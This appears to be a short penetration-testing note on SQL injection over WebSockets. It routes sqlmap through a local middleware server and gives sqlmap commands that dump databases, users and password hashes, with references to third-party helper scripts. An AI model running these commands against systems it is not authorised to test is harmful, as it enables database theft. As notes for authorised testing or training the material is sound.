killchain-compendium/Exploits/Databases/Websocket SQLi.md

Websocket SQLi

• SQLmap is not able to send websocket requests directly because of the id added to the request. Therefore you need a local webserver as a middleware which translates requests to the target. Put in the webserver URL, and the correct data structure into the script and run it.o

sqlmap -u "http://127.0.0.1:8081/?id=62009" -p "id" --dbs

Usage

First, make sure websocket-client is installed from PyPi.

Enumerate the websocket via the websocket enumeration script. You may provide the URL endpoint you want to request and the key, value of the request via the arguments in the following way

websocket_enumeration.py /values key value

I modified the script rayhan0x01 provides so that an endpoint can set. The modified script is started in the following way

sqlmap_websocket_server.py /endpoint

Start sqlmap requesting the sqlmap_websocket_server on localhost port 8081

sqlmap -u "http://127.0.0.1:8081/?id=1" --batch --risk 3 --level 5 --flush-session --dump --passwords --users

References

• rayhan0x01's git repo
• rayhan0x01's blog entry